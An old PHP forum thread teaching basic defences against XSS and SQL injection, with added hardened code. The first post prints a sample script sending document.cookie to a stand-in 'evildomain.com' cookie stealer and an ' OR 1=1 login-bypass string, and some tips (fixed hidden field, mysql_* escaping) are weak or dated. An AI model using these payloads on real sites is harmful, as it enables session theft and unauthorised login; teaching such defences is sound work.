#1, 09-20-2009, 10:41 AM
wilmec (Member, Plymouth UK)
Some basic security to use in php

If you want to guard against someone getting info from your database, try this; it's very simple.
Your code probably looks something like this:
PHP Code:
$id = $_GET['id'];

// the raw query-string value is echoed straight into the page, unescaped
echo 'Displaying news item number ' . $id;
Now, if $_GET['id'] contains a number, then all's well and good—but what happens if it contains this?

HTML Code:
<script>
window.location.href = "http://evildomain.com/cookie-stealer.php?c=" + document.cookie;
</script>
If a user passed this simple JavaScript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data on to the attacker, allowing them to log in as the user. It's really that simple.

Firstly, you must never implicitly trust user input. Always presume that every bit of input contains an attack, and code to account for that. To do this, you need to filter user input, stripping it of HTML tags so that no JavaScript can be run. The easiest way to do this is with PHP's built-in strip_tags() function, which will remove HTML from a string, rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively.

Many sites use databases as a backend to store their data, using queries to insert and select data from it. However, many people are unaware that such sites are often vulnerable to a form of attack called SQL injection.
SQL injection is when malformed user input is used directly and deliberately in an SQL query, in a way that allows the attacker to manipulate the query. This means that an attacker could delete portions of your database, make himself an admin account etc—the possibilities are endless.
One of the most common vulnerabilities is when logging in to a site. Take this example:
PHP Code:
$username = $_POST['username'];
$password = $_POST['password'];

// both POST values are interpolated straight into the query string
$result = mysql_query("
SELECT *
FROM
    site_users
WHERE
    username = '$username'
    AND
    password = '$password'
");

if (mysql_num_rows($result) > 0) {
    // logged in
}
This is vulnerable to a pretty obvious SQL injection; can you work out how an attacker could modify the query to allow himself to be logged in regardless of whether or not he has the right password?
If the attacker enters a valid username in the username field—"rob", say—and the following in the password field:
PHP Code:
' OR 1=1 ' 
The resulting query will look like this:
PHP Code:
SELECT *
FROM
    site_users
WHERE
    username = 'rob'
    AND
    password = '' OR 1=1
To prevent this from happening: as with XSS attacks, you must never trust user input. The best way of cleaning user input is using PHP's built-in mysql_real_escape_string() function; this will escape characters such as ', " and others, making them useless in "breaking out" of a quoted string as in the above example. If you're using a number in your query, then you should use intval() on the inputted number to ensure it is numeric.

So your code would look something like this:
PHP Code:
if (isset($_GET['id'])) {
    // reject anything that does not convert to a non-zero integer
    if (!intval($_GET['id'])) {
        die('Hacked');
    }
    // your SQL pages etc. will be here
}

If you find this helpful I will do more posts on security, like how to stop robots from filling in forms etc.
__________________
http://www.anscomputers.co.uk Free seo webmaster tools
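As an added example (not code from wilmec's post), here are hardened versions of both snippets in the post above: the news-item page that echoes $_GET['id'] (XSS) and the login query (SQL injection). It swaps in techniques the post does not use: output escaping with htmlspecialchars(), a PDO prepared statement instead of mysql_real_escape_string() (the mysql_* functions were removed in PHP 7), and password_hash()/password_verify() so the password never appears in SQL at all. The PDO connection $db, the site_users table with a password_hash column, and the function names are assumptions.

```php
<?php
// Added example, not code from the original post. Hardened versions of the
// news-item page (XSS) and the login form (SQL injection) discussed above.
// Assumptions: a PDO connection $db, a table site_users with columns
// username and password_hash (a password_hash() result), UTF-8 pages.
declare(strict_types=1);

// --- XSS -------------------------------------------------------------------
// Anything echoed back to the page goes through this; ENT_QUOTES also converts
// ' and ", so the result is safe inside attributes as well as text nodes.
function escapeHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate the id as a positive integer before using it. This is the post's
// intval() idea, but FILTER_VALIDATE_INT rejects values like "12abc" and
// returns false (not 0) for non-numeric input such as a <script> tag.
function renderNewsItem(array $get): string
{
    $raw = $get['id'] ?? '';
    $raw = is_string($raw) ? $raw : '';   // ?id[]=x arrives as an array
    $id  = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        // The rejected value is shown only in escaped form: the script payload
        // from the post is rendered as visible text and never executed.
        return 'Invalid news item id: ' . escapeHtml($raw);
    }
    return 'Displaying news item number ' . $id;
}

// --- SQL injection ---------------------------------------------------------
// A prepared statement sends the query text and the parameter separately, so
// input such as the post's ' OR 1=1 stays a literal username value and cannot
// change the WHERE clause. The password is never put into SQL; it is checked
// with password_verify() against the stored hash.
function login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM site_users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false; // unknown user
    }
    return password_verify($password, $row['password_hash']);
}

// Registration side of the same scheme: store a hash, never the password.
function createUser(PDO $db, string $username, string $password): void
{
    $stmt = $db->prepare(
        'INSERT INTO site_users (username, password_hash) VALUES (:username, :hash)'
    );
    $stmt->execute([
        ':username' => $username,
        ':hash'     => password_hash($password, PASSWORD_DEFAULT),
    ]);
}

// Usage in the login handler (connection details are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=site;charset=utf8mb4', 'dbuser', 'dbpass', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
// ]);
// if (login($db, $_POST['username'] ?? '', $_POST['password'] ?? '')) {
//     // logged in
// }
```

With ATTR_EMULATE_PREPARES set to false the MySQL server itself receives the query text and the parameter value separately, so there is no client-side quoting step to get wrong.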
#2, 09-21-2009, 03:06 AM
bmcoll3278 (Senior Member)

Great post, may I add another little tip.

Code to keep your PHP script from being accessed by robots or directly, instead of from the page with your form on it.

Place this code in your php file.
Code:
// the hidden "pong" field is only present when the request came from the form
$ping = isset($_POST['pong']) ? $_POST['pong'] : '';
if ($ping != "pong") {
    exit('<h2>You cannot access this file directly!</h2>');
}
then add this line to your form code
Code:
<input type="hidden" name="pong" value="pong">
This will make it difficult to access the script from anywhere other than your form.

Hope this is of use.
__________________
I hope to build a site with something for every body
www.bmcoll.com
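As an added example (not bmcoll3278's code), the same hidden-field check built on a random per-session token rather than a fixed value: a fixed value can be read by anything that fetches the form's HTML, while a session token is only known to the browser that loaded the form in the current session. The form field keeps the post's name "pong"; the function names and the session key are assumptions.

```php
<?php
// Added example, not the code from post #2. Extends the hidden-field check
// with a random token stored in the session (the usual CSRF-token pattern).
// Assumptions: sessions are enabled; the field name "pong" is kept from the post.
declare(strict_types=1);

session_start();

// Create the token once per session and reuse it for every form in that session.
function formToken(): string
{
    if (empty($_SESSION['form_token'])) {
        $_SESSION['form_token'] = bin2hex(random_bytes(32)); // 64 hex characters
    }
    return $_SESSION['form_token'];
}

// Emit the hidden input for the page that contains the form.
function hiddenTokenField(): string
{
    return '<input type="hidden" name="pong" value="'
        . htmlspecialchars(formToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Call this at the top of the script that handles the POST.
function requireValidToken(array $post): void
{
    $expected = $_SESSION['form_token'] ?? '';
    $given    = $post['pong'] ?? '';
    // hash_equals() compares in constant time so the token does not leak
    // through timing; is_string() guards against pong[]=x style input.
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        http_response_code(403);
        exit('<h2>You cannot access this file directly!</h2>');
    }
}

// Usage:
//   form page:    echo '<form method="post" action="handler.php">' . hiddenTokenField() . ' ... </form>';
//   handler.php:  requireValidToken($_POST);  // then process the submission
```

A request that arrives without the session cookie, or with a token copied from another session, fails the comparison, which is what stops a script posting straight to the handler.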
#3, 09-23-2009, 08:51 PM
helpimadj (Programmer, Scottish Borders, Scotland)

Now I like that Brian. Simple yet effective.
#4, 01-22-2010, 03:49 AM
ethan1066 (Junior Member)

I would say that the tips here from both of you are good and can be used. I like this forum, as here in each thread you will get some useful info on web development, which is good news about this forum.